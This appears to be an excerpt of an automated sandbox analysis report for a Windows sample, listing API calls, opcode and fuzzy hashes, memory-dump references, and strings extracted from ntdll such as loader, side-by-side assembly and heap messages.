                                                                                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                            • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0

                                                                                                                                             Control-flow Graph
                                                                                                                                             • control_flow_graph 298 41a790-41a7a9 299 41a7af-41a7c4 LookupPrivilegeValueW 298->299 300 41a7aa call 41af20 298->300 300->299
                                                                                                                                            APIs
                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                            • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                                                                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                            • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                                            APIs
                                                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                            • Opcode ID: 9379220829e3c419878ff4888d194fe66dd23624891254af377271388a777a72
                                                                                                                                            • Instruction ID: fd19ce839db182b36b6e96dd962a584e924bd8999524a3a1af9ee6c2b89418f0
                                                                                                                                            • Opcode Fuzzy Hash: 9379220829e3c419878ff4888d194fe66dd23624891254af377271388a777a72
                                                                                                                                            • Instruction Fuzzy Hash: ECE08C716012047BC320DFA8CC85FC73BA99F48754F11846AF96D6B241C530EA008BE1
                                                                                                                                            APIs
                                                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                            • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                                                                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                            • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 20a80c78f0da30a3ad9573edb874183dc78d70c782fe13331a4eb9dff1e31298
                                                                                                                                            • Instruction ID: f5ded5ad81ec1f8b02ac0c9cef65d979f7b7bb671df90f9e68a85f8398b6956c
                                                                                                                                            • Opcode Fuzzy Hash: 20a80c78f0da30a3ad9573edb874183dc78d70c782fe13331a4eb9dff1e31298
                                                                                                                                            • Instruction Fuzzy Hash: 60B09B71E055C5D5DF11F7A45608717B90077D1701F55C171D2030651F4738D1D5E276
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-2160512332
                                                                                                                                            • Opcode ID: 6c6f840f726f34ef97b4e5fd32a78babbfa85f49b2ae77e327b4302240578d93
                                                                                                                                            • Instruction ID: 58062439fbaa5e53f3c2c4fb4bee3adf569f8c6c35c06400edc9e414c06d5bc9
                                                                                                                                            • Opcode Fuzzy Hash: 6c6f840f726f34ef97b4e5fd32a78babbfa85f49b2ae77e327b4302240578d93
                                                                                                                                            • Instruction Fuzzy Hash: C8927D7160874AABE721DF28C884B6BF7F8BB84750F04492DFA94D7252D770E845CB92
                                                                                                                                            Strings
                                                                                                                                            • double initialized or corrupted critical section, xrefs: 017C5508
                                                                                                                                            • Critical section address., xrefs: 017C5502
                                                                                                                                            • corrupted critical section, xrefs: 017C54C2
                                                                                                                                            • undeleted critical section in freed memory, xrefs: 017C542B
                                                                                                                                            • Thread identifier, xrefs: 017C553A
                                                                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017C54CE
                                                                                                                                            • 8, xrefs: 017C52E3
                                                                                                                                            • Invalid debug info address of this critical section, xrefs: 017C54B6
                                                                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017C540A, 017C5496, 017C5519
                                                                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 017C5543
                                                                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017C54E2
                                                                                                                                            • Critical section debug info address, xrefs: 017C541F, 017C552E
                                                                                                                                            • Address of the debug info found in the active list., xrefs: 017C54AE, 017C54FA
                                                                                                                                            • Critical section address, xrefs: 017C5425, 017C54BC, 017C5534
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                            • API String ID: 0-2368682639
                                                                                                                                            • Opcode ID: f7c00f19c447e3cdf15e263f09d6f7ed1cd023f5ff560cf245e77700c7cdf790
                                                                                                                                            • Instruction ID: bc8f50e68aea79c9b807f9b9fc62ac49fd30a562f7ecc6a670d06f1dae22889c
                                                                                                                                            • Opcode Fuzzy Hash: f7c00f19c447e3cdf15e263f09d6f7ed1cd023f5ff560cf245e77700c7cdf790
                                                                                                                                            • Instruction Fuzzy Hash: F1819BB1A40358EFDB20CF99C845BAEFBB5BB48B14F20425DF504B7642D3B6A944CB61
                                                                                                                                            Strings
                                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017C2506
                                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017C2412
                                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017C2409
                                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017C2498
                                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017C2602
                                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 017C261F
                                                                                                                                            • @, xrefs: 017C259B
                                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017C2624
                                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017C24C0
                                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017C22E4
                                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017C25EB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                            • API String ID: 0-4009184096
                                                                                                                                            • Opcode ID: 31a59acb387c3d4afc67716dffb8ef7d4d6f645b6d1ac98a7b5014c1cf07df0e
                                                                                                                                            • Instruction ID: 627f21e8995c9e04d3eeee2bf91d2a70714741daf5c8e953512a81c90dc1a613
                                                                                                                                            • Opcode Fuzzy Hash: 31a59acb387c3d4afc67716dffb8ef7d4d6f645b6d1ac98a7b5014c1cf07df0e
                                                                                                                                            • Instruction Fuzzy Hash: FB026FF1D442299FDB21DB54CC84BAAF7B8AB54714F0041DEE609A7242EB70AF84CF59
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                            • API String ID: 0-2515994595
                                                                                                                                            • Opcode ID: 33f448dbbaa5e10b70168815c2ef71be6791aa12951fb47fdba316bb8d836eec
                                                                                                                                            • Instruction ID: 9c2af655aeac5249a293839181ef4a6f636ad3c25244e4c9cd0fc9f9b1966f72
                                                                                                                                            • Opcode Fuzzy Hash: 33f448dbbaa5e10b70168815c2ef71be6791aa12951fb47fdba316bb8d836eec
                                                                                                                                            • Instruction Fuzzy Hash: AD51E0715093119BD729CF298944BABFBE8FF98350F14492DEA9983380E770D649CB93
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                            • API String ID: 0-1700792311
                                                                                                                                            • Opcode ID: c77848cb4612b99da62fbc147ef34da22568a59c4841af6e6455a6f2e72b3dc2
                                                                                                                                            • Instruction ID: 51a23c1de9e2a1b57aca8f2190cc618663993fafc4be017c5f636adcf933648e
                                                                                                                                            • Opcode Fuzzy Hash: c77848cb4612b99da62fbc147ef34da22568a59c4841af6e6455a6f2e72b3dc2
                                                                                                                                            • Instruction Fuzzy Hash: D7D1EC35504A89EFDB62DFA8C854BA9FBF1FF4A744F088009F4459B292C735DA81CB14
                                                                                                                                            Strings
                                                                                                                                            • VerifierFlags, xrefs: 017D8C50
                                                                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017D8A67
                                                                                                                                            • VerifierDlls, xrefs: 017D8CBD
                                                                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017D8A3D
                                                                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 017D8B8F
                                                                                                                                            • HandleTraces, xrefs: 017D8C8F
                                                                                                                                            • VerifierDebug, xrefs: 017D8CA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                            • API String ID: 0-3223716464
                                                                                                                                            • Opcode ID: 4cdeb9843c717050c6889000abed0658145557f787e512c500f9391e180fc7bd
                                                                                                                                            • Instruction ID: e6f945952b31fc545ff1d42c32fbda57f82677eeff88fe99b927289b91e61e0b
                                                                                                                                            • Opcode Fuzzy Hash: 4cdeb9843c717050c6889000abed0658145557f787e512c500f9391e180fc7bd
                                                                                                                                            • Instruction Fuzzy Hash: 7E91787164471AEFD721EF28C880B1BFBB4EB98B14F050459FA45AB285DB30DE00CB92
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                            • API String ID: 0-1109411897
                                                                                                                                            • Opcode ID: 07b72a5689e2892ad0500c89edf40c55d9cb683e6c7f99defca879151f95412c
                                                                                                                                            • Instruction ID: 58e8d9cb30f68737ae1acf3f5ea79298996717d7b9bdeeefd4f13a313c3e9c7f
                                                                                                                                            • Opcode Fuzzy Hash: 07b72a5689e2892ad0500c89edf40c55d9cb683e6c7f99defca879151f95412c
                                                                                                                                            • Instruction Fuzzy Hash: FBA23874A0562A8FDBA4DF18CC887A9FBB5AF49304F1442E9D90EA7251DB749EC5CF00
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-792281065
                                                                                                                                            • Opcode ID: e60dbd9d340e9a791b20f7275ed0b9b1028703a4e3bcf0bfa153c218bf20df6e
                                                                                                                                            • Instruction ID: dcdc5d77cd288713616e8e6d07fcc7f8969245beb754c6acc6b045493717e336
                                                                                                                                            • Opcode Fuzzy Hash: e60dbd9d340e9a791b20f7275ed0b9b1028703a4e3bcf0bfa153c218bf20df6e
                                                                                                                                            • Instruction Fuzzy Hash: A2914C70B40315ABEB35EF58D859BADFBA2BF50B24F10016CFA4567286DF709A01CB90
                                                                                                                                            Strings
                                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017A9A2A
                                                                                                                                            • LdrpInitShimEngine, xrefs: 017A99F4, 017A9A07, 017A9A30
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017A9A11, 017A9A3A
                                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017A99ED
                                                                                                                                            • apphelp.dll, xrefs: 01746496
                                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017A9A01
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-204845295
                                                                                                                                            • Opcode ID: 24751cf94300302f8283951ec0dbb80248cc7da712f5443c0921d5e593cdd0e9
                                                                                                                                            • Instruction ID: a8a7cf7521e9d9714086634abb7859110c568682588b9f41b751692a0f882c66
                                                                                                                                            • Opcode Fuzzy Hash: 24751cf94300302f8283951ec0dbb80248cc7da712f5443c0921d5e593cdd0e9
                                                                                                                                            • Instruction Fuzzy Hash: 4751B1712083009FD720DF24D855AABFBE8FBC5748F50492EFA8597165EB30EA04CB92
                                                                                                                                            Strings
                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017C21BF
                                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 017C2160, 017C219A, 017C21BA
                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017C2178
                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017C2180
                                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017C219F
                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 017C2165
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                            • API String ID: 0-861424205
                                                                                                                                            • Opcode ID: 63b540292144187f2c21c2cba3f544afaf47fa749ed15c7d1d816b8e99f1657c
                                                                                                                                            • Instruction ID: 6e2356ef26fa2987a2c52318308e38ac65d2e64a1848c44b05b83f4e27421e9b
                                                                                                                                            • Opcode Fuzzy Hash: 63b540292144187f2c21c2cba3f544afaf47fa749ed15c7d1d816b8e99f1657c
                                                                                                                                            • Instruction Fuzzy Hash: 483135BAB802157BE721AA9A8C45F5BFA78DBE5F40F05005DFB05A7103D270AE01C3A0
                                                                                                                                            Strings
                                                                                                                                            • LdrpInitializeImportRedirection, xrefs: 017C8177, 017C81EB
                                                                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 017C8170
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0178C6C3
                                                                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 017C81E5
                                                                                                                                            • LdrpInitializeProcess, xrefs: 0178C6C4
                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 017C8181, 017C81F5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                            • API String ID: 0-475462383
                                                                                                                                            • Opcode ID: 3075876420b854768752c25a6ee5f918a89cdb05f5b4f3083c4a05fda4311cfa
                                                                                                                                            • Instruction ID: de51529f165812ae94f34db7703a41b78102cf01aa2d3582613f90380445bcec
                                                                                                                                            • Opcode Fuzzy Hash: 3075876420b854768752c25a6ee5f918a89cdb05f5b4f3083c4a05fda4311cfa
                                                                                                                                            • Instruction Fuzzy Hash: 5731F5B17443469FC324EF29D949E1AFBE4EFD4B14F04056CF9816B295EA20ED04C7A2
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 01792DF0: LdrInitializeThunk.NTDLL ref: 01792DFA
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01790BA3
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01790BB6
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01790D60
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01790D74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1404860816-0
                                                                                                                                            • Opcode ID: 38bb7ae92eeaf65440858b24f7449851b7884c1ce95b2e36abfe1eba4f54e396
                                                                                                                                            • Instruction ID: 1f9c7388f6283ee43550740c7046be8ea0cc9565e38b3668d706e68d6af4a72d
                                                                                                                                            • Opcode Fuzzy Hash: 38bb7ae92eeaf65440858b24f7449851b7884c1ce95b2e36abfe1eba4f54e396
                                                                                                                                            • Instruction Fuzzy Hash: CD426B71900715DFDB61CF28C880BAAB7F9BF48314F1445ADEA89DB245E770AA84CF61
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                            • API String ID: 0-379654539
                                                                                                                                            • Opcode ID: 3ef561fda4a8b666410482df29a9e193b2c111ab0295dbd1e6390d63f300c7a3
                                                                                                                                            • Instruction ID: 6666ee9c077c33dfe65aa4795e6809cbc22ee39580c6a78a0209f632858340b8
                                                                                                                                            • Opcode Fuzzy Hash: 3ef561fda4a8b666410482df29a9e193b2c111ab0295dbd1e6390d63f300c7a3
                                                                                                                                            • Instruction Fuzzy Hash: 03C17B741083828FD751CF58C044BAAFBE4BF98708F044ABAFD958B251E7B4DA49CB52
                                                                                                                                            Strings
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01788421
                                                                                                                                            • LdrpInitializeProcess, xrefs: 01788422
                                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0178855E
                                                                                                                                            • @, xrefs: 01788591
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-1918872054
                                                                                                                                            • Opcode ID: 6066f09be4724ecc8fc38d90a364740cdcfbcfd8c8a24384b47b9816c4cbe0e7
                                                                                                                                            • Instruction ID: 116a4c5519c960d12f5495bc8c7d627664501930faff2397578d9cab28702972
                                                                                                                                            • Opcode Fuzzy Hash: 6066f09be4724ecc8fc38d90a364740cdcfbcfd8c8a24384b47b9816c4cbe0e7
                                                                                                                                            • Instruction Fuzzy Hash: 9B917B71648345AFDB21EF65CC44FABFAE8BF84754F80092EFA8496155E730DA04CB62
                                                                                                                                            Strings
                                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017C21D9, 017C22B1
                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017C22B6
                                                                                                                                            • .Local, xrefs: 017828D8
                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 017C21DE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                            • API String ID: 0-1239276146
Strings
• RtlDeactivateActivationContext, xrefs: 017C3425, 017C3432, 017C3451
• SXS: %s() called with invalid flags 0x%08lx, xrefs: 017C342A
• SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017C3437
• SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017C3456
Similarity
• API ID:
